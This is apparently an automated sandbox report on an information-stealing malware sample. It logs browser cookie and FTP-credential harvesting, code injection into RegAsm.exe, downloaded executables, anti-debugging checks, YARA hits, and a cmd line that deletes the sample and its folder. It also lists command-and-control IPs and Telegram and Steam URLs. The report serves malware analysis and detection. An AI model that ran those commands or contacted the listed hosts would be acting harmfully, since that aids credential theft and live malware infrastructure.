NtProtectVirtualMemory Aug. 24, 2024, 7 p.m.	process_identifier: 2736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x730e1000 process_handle: 0xffffffff	1

Steals private information from local Internet browsers (50 out of 5867 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Local Extension Settings\djclckkglechooblngghdinmeemkbgci\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\apenkfbbpmhihehmihndmmcdanacolnh\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SwReporter\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Local Extension Settings\ciojocpkclfflombbcfigcijjcbkmhaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opfgelmcmbiajamepnmloijbpoleiama\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.5_0\_locales\sv\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\fiikommddbeccaoicoejoniammnalkfa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\oboonakemofpalcgghocfoadofidjkkk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_2\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OnDeviceHeadSuggestModel\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\fooolghllnmhmmndgjiamiiodkpenpbb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PnaclTranslationCache\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\recovery\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\LOCK\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8620.824.0.0_0\_locales\fa\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\bfogiafebfohielmmehodmfbbebbbpei\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\MANIFEST-000001\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\naepdomgkenhinolocfifgehidddafch\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\omaabbefbmiijedngplfjmnooppbclkk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SafetyTips\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\bmikpgodpkclnkgmnpphehdgcimmided\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\fdjamakpfbbddfjaooikfcpapjohcfmg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch\CURRENT

Creates executable files on the filesystem (8 events)

file	C:\Users\test22CGCAKKKEGC.exe
file	C:\ProgramData\vcruntime140.dll
file	C:\ProgramData\msvcp140.dll
file	C:\ProgramData\nss3.dll
file	C:\Users\test22JKEGIDGDGH.exe
file	C:\ProgramData\freebl3.dll
file	C:\ProgramData\mozglue.dll
file	C:\ProgramData\softokn3.dll

Creates a suspicious process (6 events)

cmdline	C:\Windows\System32\cmd.exe /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\BFCGDAAKFHID" & exit
cmdline	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\test22JKEGIDGDGH.exe"
cmdline	C:\Windows\System32\cmd.exe /c start "" "C:\Users\test22JKEGIDGDGH.exe"
cmdline	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\test22CGCAKKKEGC.exe"
cmdline	C:\Windows\System32\cmd.exe /c start "" "C:\Users\test22CGCAKKKEGC.exe"
cmdline	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\BFCGDAAKFHID" & exit

Drops a binary and executes it (3 events)

file	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
file	C:\Users\test22JKEGIDGDGH.exe
file	C:\Users\test22CGCAKKKEGC.exe

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Aug. 24, 2024, 6:59 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c start "" "C:\Users\test22JKEGIDGDGH.exe" filepath: C:\Windows\System32\cmd.exe	1	1
ShellExecuteExW Aug. 24, 2024, 6:59 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c start "" "C:\Users\test22CGCAKKKEGC.exe" filepath: C:\Windows\System32\cmd.exe	1	1
ShellExecuteExW Aug. 24, 2024, 7 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\BFCGDAAKFHID" & exit filepath: C:\Windows\System32\cmd.exe	1	1

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (5 events)

Time & API	Arguments	Status	Return
Process32NextW Aug. 24, 2024, 6:59 p.m.	snapshot_handle: 0x00000330 process_name: mobsync.exe process_identifier: 1044	1	1
Process32NextW Aug. 24, 2024, 6:59 p.m.	snapshot_handle: 0x00000330 process_name: conhost.exe process_identifier: 1608	1	1
Process32NextW Aug. 24, 2024, 7 p.m.	snapshot_handle: 0x000005bc process_name: RegAsm.exe process_identifier: 2736	1	1
Process32NextW Aug. 24, 2024, 7 p.m.	snapshot_handle: 0x000005bc process_name: conhost.exe process_identifier: 2096	1	1
Process32NextW Aug. 24, 2024, 7 p.m.	snapshot_handle: 0x000005bc process_name: pw.exe process_identifier: 2124	1	1

An executable file was downloaded by the process regasm.exe (9 events)

Time & API	Arguments	Status	Return
InternetReadFile Aug. 24, 2024, 6:59 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL×Ýc¿à!& @àa0: Ð* Ð0 ¨@ < Ð.text%&`P`.data\|'@(,@`À.rdatapDpFT@`@.bss(À`À.edata*Ð,@0@.idataÐ Æ@0À.CRT, Ô@0À.tls Ö@0À.rsrc¨0 Ø@0À.reloc<@ >Þ@0B/48 @@B/19RÈ Ê" @B/31]'`(ì @B/45-.@B/57\ÀB@0B/70#ÐN@B/81 request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 24, 2024, 6:59 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELó4cà"!4pÐ Ëý @AH S È xF P/ ð# ¤ @.text `.rdataÄ @@.data<F0 @À.00cfg @@.rsrcx @@.relocð# $" @B request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 24, 2024, 6:59 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL¤4cà"!¶^À¹ jª @A`ãWä·, ° P/0 ØAS¼øhÐ ì¼ÜäZ.textaµ¶ `.rdata Ð º@@.dataDàÄ@À.00cfg È@@.tls Ê@À.rsrc° Ì@@.relocØA0 BÖ@B request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 24, 2024, 6:59 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Ù1Cò_ò_ò_)n°ò_Ìò_ò^"ò_Ï^ò_Ï\ò_Ï[Óò_ÏZÑò_Ï_ò_Ï ò_Ï]ò_Richò_PELê0]à"!(`Ù@ ð,à@AgÏèr ðèA°¬=`x8¸w@päÀc@.text&( `.dataH)@,@À.idata¬pD@@.didat4X@À.rsrcð Z@@.reloc¬=°>^@B request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 24, 2024, 6:59 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELÐ4cà"!Ø.`£pl- @Aä&úÞÄ@Px P/`\°ð \|Ê\&@.text×Ø `.rdatalïððÜ@@.dataDRà.Ì@À.00cfg@ú@@.rsrcxPü@@.reloc\` @B request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 24, 2024, 6:59 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELó4cà"!ÌðPÏSg@ADvSwð°ÀP/ÀÈ58qà {.text&ËÌ `.rdataÔ«à¬Ð@@.data\|@À.00cfg @@.rsrc°@@.relocÈ5À6@B request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 24, 2024, 6:59 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÀÅäÕ¤¤¤08e¤Ü¤¤¬¤ÖÌ¤ÖÌ¤ÖÌ¤ÖÌ¤ÖÌu¤ÖÌ¤Rich¤PEL\|ê0]à"!ÞÙð 0Ôm@Aàã ¸úðA 8¸ @´.textôÜÞ `.dataôðâ@À.idataä@@.rsrcê@@.reloc î@B request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 24, 2024, 6:59 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELñÈfàÌë @ @`PëKÀÖ(& ê H.text¤Ë Ì `.rsrcÀÎ@@.reloc Ô@BëHÛD×æcE\|R-À¿a/Óÿmê&¸WßXþöÅ$}ù¾h¿%PªB×¤ýìtÀö²½pÏÝ"Í?J/®ÕóÇ"FÁleÜ@VËé¥]^êö¼ooB.ï*Ãtðáuò%N´0ëù¿¨½õÔçUÍmÃ²8vá·NÈ1£ys]þ\|a\|V\f{:ê¥ë_û1¤³¾¸ôL}²änÐû§ëøÅªkC>kÈêeWQ(¥Åâ ==^Øx¸¢GÌc×B u'm½áM»a®DÌ& üöØcµÚRuÉRÿèýÿ¸ )C£ùõa6CV¡è0JÓÞe+=·&A?Ã$!×÷¬,ôþuX¡M¾7§¨3ãQÈµ¥£ù9Ëaý-°Å©Ï~Åö@¶X6phueÞ8º?ýç>,Ç\|{FPaoÜwZBcG92û3A4 ní;üÞqãtaªü :`Â1rÅÚß4et¨ÔZõ¨Ï1çúy+x/·ÌÙq0 request_handle: 0x00cc000c	1	1
InternetReadFile Aug. 24, 2024, 6:59 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELêðÈfàTs @ À`PsKÀ^(& r H.text¤S T `.rsrcÀV@@.reloc \@BsHcºçéìâ:¤jXì;î:¦fÝqcÏ ¯µ[Þ¤EiÔ¼©12¥dr=þ¶Ë'îÈæ¥îrÿêØpëg2CHxº!N¤µtcZ-lOýüÈÁ·MÞ¿³Û¹Õ}Þ5³°µÌJòZÀÕZQXæhÊdö\|8-VÌ%TÑÒÇL³®ªØø¯Õ×]©HÃC²¤uW¤V(0¶@ ñ^ÐÅKÀÇeh¤{_G7,Fùñ'1[°!JçÞêÖæ³RÑ\|ØE¤¶ßH?³=8¹û:á_oP¼9J¸ô4KQ}¶â0!º¨VQûí¸,Ný©õ\£Ë·üSÁq¿2rzÂôQKê·0¨WFÖÔr[¥Vá\aïi`FC{ÕlÖÕq}=Æ\Å+Â¤xÔ*_7;ÃaI©n£Eñô,¾j\Ýï&ó0tºíÔ¡c3ùËüä¦÷ø-³ç¼PJk&«x×¶WcÚÖV ÇÏ¡ÝÉUà§ò¶[ request_handle: 0x00cc000c	1	1

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00030a00', u'virtual_address': u'0x00002000', u'entropy': 7.990811053342104, u'name': u'.text', u'virtual_size': u'0x000309a4'}

entropy

7.99081105334

description

A section with a high entropy has been found

entropy

0.989821882952

description

Overall entropy of this PE file is high

Potentially malicious URLs were found in the process memory dump (3 events)

url	https://t.me/jamelwt
url	https://steamcommunity.com/profiles/76561199761128941
url	https://t.me/iyigunl

Yara rule detected in process memory (50 out of 127 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Client_SW_User_Data_Stealer	rule	Client_SW_User_Data_Stealer
description	ftp clients info stealer	rule	infoStealer_ftpClients_Zero
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	C:\Windows\System32\cmd.exe /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\BFCGDAAKFHID" & exit
cmdline	"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & rd /s /q "C:\ProgramData\BFCGDAAKFHID" & exit

Communicates with host for which no DNS query was performed (3 events)

host	116.203.10.69
host	147.45.44.104
host	46.8.231.109

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2076 region_size: 2371584 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001e4	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2736 region_size: 2363392 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001e8	1
NtAllocateVirtualMemory Aug. 24, 2024, 6:59 p.m.	process_identifier: 2996 region_size: 323584 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000001e4	1

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Deletes executed files from disk (1 event)

file	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Executes one or more WMI queries (2 events)

wmi
wmi	Select * From AntiVirusProductroot\SecurityCente

Potential code injection by writing to the memory of another process (8 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $¢båæõ¶æõ¶æõ¶u^¶þõ¶uk¶ëõ¶u_¶Üõ¶ï{v¶åõ¶fzô·äõ¶ï{f¶áõ¶æô¶õ¶uZ¶ôõ¶uh¶çõ¶Richæõ¶PEL7»fà ÈB"dà@0$@È©<à#\|$àô.textJÆÈ à.rdataÞÎàÐÌ@@.data+!°@À.reloc*Dà#F¨@B base_address: 0x00400000 process_identifier: 2076 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: LáA.?AVtype_info@@Næ@»±¿D ! 5A CPR S WYl m pr ) ¡¤§ ·Î× ÿÿÿÿÿÿÿÿÈAÈAÈAÈAÈAÈAÈAÈAÈAÈAC$÷A ÷A÷A÷A÷A÷A÷A÷AüöAôöAèöAÜöAÔöAÈöAÄöAÀöA¼öA¸öA´öA°öA¬öA¨öA¤öA öAöAöAöAöA\|öAtöA´öAlöAdöA\öAPöAHöA<öA0öA,öA(öAöAöAüõA ôõAìõAäõAÜõAÔõAÌõAÄõA´õA¤õAõAõAlõA\õAHõA@õA8õA0õA(õA õAõAõAõAõAøôAðôAèôAØôAÄôA¸ôA¬ôA õA ôAôAôApôA`ôALôA8ôA0ôA(ôAôAìóAØóA³B³B³B³B³BÈºB¨øA0ýA°þA³Bx´B abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZXµB¤`y!¦ß¡¥àü@~ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þÿÿÿÿ þÿÿÿ¬úA..ÀºBÈBÈBÈBÈBÈBÈBÈBÈBÈBÄºBÈBÈBÈBÈBÈBÈBÈBÈºB¨øAªúA.LáA.?AVlogic_error@std@@LáA.?AVlength_error@std@@LáA.?AVout_of_range@std@@LáA.?AVexception@std@@LáA.?AVbad_alloc@std@@ base_address: 0x0042b000 process_identifier: 2076 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2076 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $d¾] ß3Û ß3Û ß3ÛO©Û+ß3ÛO©Ûß3Û)§°Û%ß3Û)§ Û.ß3Û ¦2Ú#ß3Û ß2Û½ß3ÛO©Ûß3ÛO©®Û!ß3ÛRich ß3ÛPELñÖÇfà Äè0Wà@$Ï@ÀSXÀSXP´°#°À##àô.textàÃÄ `.rdatazà\|È@@.dataÈE!`&D@À.rsrc°°#j@@.relocÌCÀ#Dl@B base_address: 0x00400000 process_identifier: 2736 process_handle: 0x000001e8	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: 0 HX°#Vä<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> </assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x0063b000 process_identifier: 2736 process_handle: 0x000001e8	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2736 process_handle: 0x000001e8	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELÓÈfàlÈÐ@ð@ ¤x HB0¥¬.textXkl `.rdataW(*p@@.dataDî°Z@À.relocHB Dô@B base_address: 0x00400000 process_identifier: 2996 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2996 process_handle: 0x000001e4	1	1

Code injection by writing an executable or DLL to the memory of another process (3 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: MZÿÿ¸@èº´ Í!¸LÍ!This program cannot be run in DOS mode. $¢båæõ¶æõ¶æõ¶u^¶þõ¶uk¶ëõ¶u_¶Üõ¶ï{v¶åõ¶fzô·äõ¶ï{f¶áõ¶æô¶õ¶uZ¶ôõ¶uh¶çõ¶Richæõ¶PEL7»fà ÈB"dà@0$@È©<à#\|$àô.textJÆÈ à.rdataÞÎàÐÌ@@.data+!°@À.reloc*Dà#F¨@B base_address: 0x00400000 process_identifier: 2076 process_handle: 0x000001e4	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $d¾] ß3Û ß3Û ß3ÛO©Û+ß3ÛO©Ûß3Û)§°Û%ß3Û)§ Û.ß3Û ¦2Ú#ß3Û ß2Û½ß3ÛO©Ûß3ÛO©®Û!ß3ÛRich ß3ÛPELñÖÇfà Äè0Wà@$Ï@ÀSXÀSXP´°#°À##àô.textàÃÄ `.rdatazà\|È@@.dataÈE!`&D@À.rsrc°°#j@@.relocÌCÀ#Dl@B base_address: 0x00400000 process_identifier: 2736 process_handle: 0x000001e8	1	1
WriteProcessMemory Aug. 24, 2024, 6:59 p.m.	buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PELÓÈfàlÈÐ@ð@ ¤x HB0¥¬.textXkl `.rdataW(*p@@.dataDî°Z@À.relocHB Dô@B base_address: 0x00400000 process_identifier: 2996 process_handle: 0x000001e4	1	1

Collects information about installed applications (50 out of 76 events)

Time & API	Arguments	Status
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExA Aug. 24, 2024, 6:59 p.m.	key_handle: 0x00000334 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: ????? ?? 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
